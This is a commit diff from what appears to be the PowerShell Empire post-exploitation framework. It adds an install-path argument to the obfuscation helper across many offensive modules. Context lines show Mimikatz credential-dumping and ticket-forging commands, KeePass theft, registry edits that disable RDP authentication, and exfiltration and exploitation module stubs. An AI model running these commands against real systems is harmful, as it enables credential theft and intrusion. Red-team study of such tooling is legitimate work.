scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/packet_capture.py
View File

@ -90,5 +90,5 @@ class Module:
if persistent != "":
script += " persistent=yes"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/prompt.py
View File

@ -120,5 +120,5 @@ Invoke-Prompt """
else:
script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/screenshot.py
View File

@ -115,5 +115,5 @@ Get-Screenshot"""
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py
View File

@ -118,6 +118,6 @@ class Module:
scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/vaults/find_keepass_config.py
View File

@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py
View File

@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/vaults/keethief.py
View File

@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py
View File

@ -92,6 +92,6 @@ class Module:
scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/credential_injection.py
View File

@ -151,6 +151,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/enum_cred_store.py
View File

@ -54,6 +54,6 @@ class Module:
scriptEnd = "\n%s" %(scriptCmd)
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/invoke_kerberoast.py
View File

@ -124,6 +124,6 @@ class Module:
scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/cache.py
View File

@ -76,6 +76,6 @@ class Module:
scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/certs.py
View File

@ -73,6 +73,6 @@ class Module:
# add in the cert dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/command.py
View File

@ -79,6 +79,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/dcsync.py
View File

@ -100,6 +100,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py
View File

@ -109,6 +109,6 @@ class Module:
scriptEnd += "| Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/extract_tickets.py
View File

@ -72,6 +72,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/golden_ticket.py
View File

@ -150,6 +150,6 @@ class Module:
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/logonpasswords.py
View File

@ -78,6 +78,6 @@ class Module:
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/lsadump.py
View File

@ -86,6 +86,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/mimitokens.py
View File

@ -137,6 +137,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/pth.py
View File

@ -126,6 +126,6 @@ class Module:
scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/purge.py
View File

@ -74,6 +74,6 @@ class Module:
# set the purge command
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/sam.py
View File

@ -76,6 +76,6 @@ class Module:
scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/silver_ticket.py
View File

@ -162,6 +162,6 @@ class Module:
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/mimikatz/trust_keys.py
View File

@ -80,6 +80,6 @@ class Module:
else:
scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/powerdump.py
View File

@ -70,6 +70,6 @@ class Module:
scriptEnd = "Invoke-PowerDump"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/sessiongopher.py
View File

@ -136,6 +136,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/tokens.py
View File

@ -155,6 +155,6 @@ class Module:
if self.options['RevToSelf']['Value'].lower() != "true":
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/credentials/vault_credential.py
View File

@ -73,6 +73,6 @@ class Module:
scriptEnd = "Get-VaultCredential"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/exfiltration/egresscheck.py
View File

@ -119,6 +119,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

4
lib/modules/powershell/exfiltration/exfil_dropbox.py
View File

@ -84,7 +84,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-DropboxUpload {
@ -137,5 +137,5 @@ Invoke-DropboxUpload """
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
return script

2
lib/modules/powershell/exploitation/exploit_jboss.py
View File

@ -110,6 +110,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/exploitation/exploit_jenkins.py
View File

@ -95,6 +95,6 @@ class Module:
scriptEnd += " -Cmd " + command
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/inveigh_relay.py
View File

@ -193,6 +193,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_dcom.py
View File

@ -131,6 +131,6 @@ class Module:
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_executemsbuild.py
View File

@ -185,6 +185,6 @@ class Module:
scriptEnd += " | Out-String"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_psexec.py
View File

@ -146,6 +146,6 @@ class Module:
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_psremoting.py
View File

@ -136,5 +136,5 @@ class Module:
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/lateral_movement/invoke_sqloscmd.py
View File

@ -132,6 +132,6 @@ class Module:
if password != "":
scriptEnd += " -Password "+password
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_sshcommand.py
View File

@ -123,6 +123,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/invoke_wmi.py
View File

@ -145,5 +145,5 @@ class Module:
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py
View File

@ -187,6 +187,6 @@ class Module:
script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/lateral_movement/jenkins_script_console.py
View File

@ -121,6 +121,6 @@ class Module:
scriptEnd += " -Port "+str(self.options['Port']['Value'])
scriptEnd += " -Cmd \"" + launcher + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
View File

@ -162,5 +162,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/disable_rdp.py
View File

@ -55,5 +55,5 @@ class Module:
# command to enable NLA only if the enable runs successfully
script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/downgrade_account.py
View File

@ -100,5 +100,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/enable_multi_rdp.py
View File

@ -73,6 +73,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/management/enable_rdp.py
View File

@ -57,5 +57,5 @@ class Module:
# command to disable NLA
script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/get_domain_sid.py
View File

@ -84,5 +84,5 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/honeyhash.py
View File

@ -90,6 +90,6 @@ class Module:
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/management/invoke_script.py
View File

@ -77,5 +77,5 @@ class Module:
script += "%s" %(scriptCmd)
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/lock.py
View File

@ -87,5 +87,5 @@ Function Invoke-LockWorkStation {
Invoke-LockWorkStation; "Workstation locked."
"""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/logoff.py
View File

@ -62,5 +62,5 @@ class Module:
else:
script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/management/mailraider/disable_security.py
View File

@ -110,6 +110,6 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/management/mailraider/get_emailitems.py
View File

@ -87,6 +87,6 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

Some files were not shown because too many files have changed in this diff Show More